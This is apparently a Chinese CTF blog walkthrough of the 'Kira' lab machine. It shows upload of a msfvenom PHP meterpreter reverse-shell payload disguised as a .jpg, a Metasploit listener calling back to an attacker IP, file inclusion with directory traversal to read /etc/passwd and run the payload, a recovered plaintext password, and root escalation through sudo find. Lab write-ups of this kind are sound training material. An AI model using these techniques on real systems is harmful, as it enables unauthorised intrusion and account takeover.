Kira CTF靶机

简介: Kira CTF靶机

靶机等级:Low

技能考点:文件上传、文件包含漏洞

漏洞描述:当服务器开启allow_url_include选项时,就可以通过php的某些特性函数如include(),require()和include_once(),require_once(),利用url去动态包含文件,这时,如果文件名参数用户可控且没有做严格过滤,就导致任意文件读取或者任意命令执行(偷梁换柱)

0x01 信息收集

获取靶机IP地址


arp-scan -l

使用nmap 对靶机做积极的扫描


nmap -A 192.168.174.131


打开浏览器,访问靶机开放的HTTP(80)服务:


总结:

  • 靶机IP地址(192.168.174.131)
  • 开放的服务:HTTP(80)
  • 访问靶机开放的HTTP服务,发现存在一个上传入口


0x02 漏洞探测

思路:发现上传入口,尝试上传一个图片木马


1. 使用msfvenom生成图片木马

  • lhost,地址是攻击端地址

  • lport,端口是你攻击端监听端口


2. 打开 metasploit 监听

    use exploit/multi/handler #调用这个模块
    set payload php/meterpreter/reverse_tcp #设置payload
    set LHOST 192.168.174.177 #设置监听地址
    set LPORT 443 #设置监听端口
    exploit #利用


    3. 修改文件扩展名,上传图片木马

      mv shell.php webshell.jpg

      上传成功后,发现上传的路径:uploads/webshell.jpg


      4. 在初始的页面发现还有一个按钮

      0x03 拿到SHELL

      接下来,尝试读取我们的图片木马,我们先读取账户文件(/etc/passwd) 试试


      可是,当我们测试尝试读取文件的时候,发现读取不到这是为什么呢?


      我决定采取遍历目录的方式再尝试一下,果然读取到了


      接下来,读取我们的图片木马文件,返回 metasploit 可以看到,我们已经拿到一个会话

      1. 拿到shell后靶机信息收集

        uname -r              #查看内核版本信息
        uname -a              #查看系统信息
        cat /etc/passwd       #查看账户文件


        靶机系统是 Ubuntu 18.04 版本,在账户文件中发现了一个叫bassam的账户


        在靶机/var/www/html/ 目录下我们发现了一个可疑的目录


        进入后,发现了bassam账户的密码文件


        查看这个文件得到bassam密码Password123!@#


        切换到bassam 用户,可以看到成功切换到bassam用户


        好的,接下来进行提权


        0x04 提权

        如何提权呢?首先,我们看一下授权列表,发现find程序可以以root身份运行

          sudo -l


          那么,我们可以利用find来执行一个SHELL,提权成功


          至此,靶机提权完成!

          相关文章
          |
          缓存 开发工具 数据库
          Docker 及 Docker Compose 安装指南
          Docker 是一个开源的容器化平台,可以帮助我们快速构建、打包和运行应用程序。而 Docker Compose 则是用于管理多个容器应用的工具,可以轻松定义和管理多个容器之间的关系。现在,让我们开始安装过程吧!
          1239 0
          |
          机器学习/深度学习 存储 算法
          时序数据特征工程浅析
          内容摘要特征工程是指将原始数据标记处理为价值密度更高,更容易解释目标问题的工程化过程,在面向大量原始采集的数据集统计分析,尤其是对于高通量持续采集、且价值密度较低的时序数据更是如此。时序数据特征工程则是指利用有效方法,将原始时序数据转化为带有含义分类标签的序列数据片段或特征数值,例如,我们可以将指定时间窗口序列数据标识为特定异常关联数据,并保留平均、最大、最小值作为该序列的特征值。这样我们就可以围
          4086 0
          时序数据特征工程浅析
          |
          开发框架 监控 Kubernetes
          CTF本地靶场搭建——GZ:CTF基础使用
          GZ::CTF是一个基于ASP.NET Core的开源CTF竞赛平台,支持Docker或K8s容器部署,提供静态和动态题目类型,包括静态附件、动态附件、静态容器和动态容器,具备动态分值功能,如三血奖励和动态flag作弊检测。平台还具有实时通知、邮件验证、用户权限管理、Writeup收集、流量代理转发等功能。此外,它包含比赛管理、队伍管理、用户管理等多个管理模块,适合举办和参与网络安全竞赛。
          |
          NoSQL Ubuntu Linux
          CTF-Pwn 入门:环境搭建
          CTF-Pwn 入门:环境搭建
          |
          传感器 数据采集 存储
          LabVIEW阀性能试验台测控系统
          LabVIEW阀性能试验台测控系统
          116 0
          |
          Shell PHP
          BUUCTF---[MRCTF2020]你传你呢1
          BUUCTF---[MRCTF2020]你传你呢1
          |
          SQL 数据采集 监控
          系统层和应用层安全防护
          系统层和应用层安全防护
          1672 0
          |
          Web App开发 安全 .NET
          FCKeditor上传漏洞总结
          0x01 FCKeditor简介 FCKeditor是一个专门使用在网页上属于开放源代码的所见即所得文字编辑器。它志于轻量化,不需要太复杂的安装步骤即可使用。
          3608 1
          |
          边缘计算 网络协议 网络安全
          【网络安全 | 信息收集】CDN的判断与绕过、nslookup基本使用
          【网络安全 | 信息收集】CDN的判断与绕过、nslookup基本使用
          1485 0
          |
          Linux 网络安全 数据安全/隐私保护